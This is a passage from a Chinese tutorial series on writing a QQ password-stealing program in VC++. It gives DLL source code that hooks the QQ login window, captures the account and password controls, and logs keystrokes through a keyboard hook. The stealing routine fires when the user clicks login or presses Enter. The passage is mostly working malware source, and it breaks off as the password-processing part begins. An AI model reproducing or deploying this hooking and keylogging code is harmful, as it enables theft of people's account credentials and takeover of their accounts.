用VC++模拟实现QQ密码盗窃软件[图](2)
第二部分:(2)安装钩子
找到了QQ登陆窗口后,就成功了一半。
下面是DLL文件中的安装HOOK的函数SetQQHook(), 为什么要用DLL(动态连接库)?要去“钩”其他进程的消息,得让HOOK函数在DLL中,这样好映射到其地址空间中!
BOOL WINAPI SetQQHook(HWND hQQLogin) {
//获得登陆框的句柄 BOOL bRet = FALSE;
if (hQQLogin != NULL)
{ DWORD dwThreadID = GetWindowThreadProcessId(hQQLogin, NULL);
//这是什么意思?看MSDN
g_hNum = GetDlgItem(hQQLogin, 138);
//不同版本QQ,此处不一样! 得到QQ号的子窗口句柄
g_hPsw = GetDlgItem(hQQLogin, 180);
//不同版本QQ,此处不一样!得到QQ密码的子窗口句柄
if (g_hNum == NULL) {
MessageBox(NULL,"哭了,号码句柄都没有得到!","郁闷",0);
return FALSE; }
if(g_hPsw==NULL) { MessageBox(NULL,"哭了,密码句柄都没有得到!","郁闷",0);
return FALSE; } 分别键盘HOOK,和界面部分消息处理的HOOK
g_hProc = SetWindowsHookEx(WH_CALLWNDPROC, CallWndProc, g_hInstDLL, dwThreadID);
g_hKey = SetWindowsHookEx(WH_KEYBOARD, KeyboardProc, g_hInstDLL, dwThreadID);
bRet = (g_hProc != NULL) && (g_hKey != NULL); }
else {
// 卸载钩子 bRet = UnhookWindowsHookEx(g_hProc) && UnhookWindowsHookEx(g_hKey);
g_hProc = NULL;
g_hKey = NULL;
g_hNum = NULL; }
return bRet; }
上面是安装HOOK部分的代码,就这么简单,上面提到了CallWndProc,KeyboardProc是两个回调函数,是我第三部分要解释的钩子函数
第三部分:(3)钩子函数的解释
CallWndProc,KeyboardProc是两个回调函数的原型和具体代码如下:
// 钩子过程,监视“登陆”的命令消息 LRESULT CALLBACK CallWndProc(int nCode, WPARAM wParam, LPARAM lParam) { CWPSTRUCT *p = (CWPSTRUCT *)lParam;
// 捕获“登陆”按钮
if (p->message == WM_COMMAND && p->wParam ==16032)
//下面个函数是我在第四部分介绍-“处理密码”部分会仔细说明
//当用户点了登陆按钮,说明QQ号码和QQ密码已经填写完毕,当然可以去获得密码了
GetPasswrod();
return CallNextHookEx(g_hProc, nCode, wParam, lParam); }
// 键盘钩子过程,监视“登陆”的热键消息 LRESULT CALLBACK KeyboardProc(int nCode, WPARAM wParam, LPARAM lParam) {
// 捕获热键消息,记录键盘的按键盘过程,pmsg是PMSG类型的,i是全局Static类型的 pmsg[i].wParam =wParam;
i++;
if (wParam == VK_RETURN) //用户使用键盘“回车”来登陆,用户用了回车后,就可以可以去获得密码了
GetPasswrod();
return CallNextHookEx(g_hKey, nCode, wParam, lParam); }
在明白了这两个钩子函数后就可以看后期是如何具体处理密码的了,这就是下面的第四部分内容
第四部分:(4)处理密码
如果您读到了此处,我想得暂停一会,先让我来帮你回忆一下前面提到的几个关键的变量
第一个:QQ号的子窗口句柄 g_hNum
第二个:QQ密码的子窗口句柄 g_hPsw //此部分暂时不使用,下面
第三个:存键盘按键的 pmsg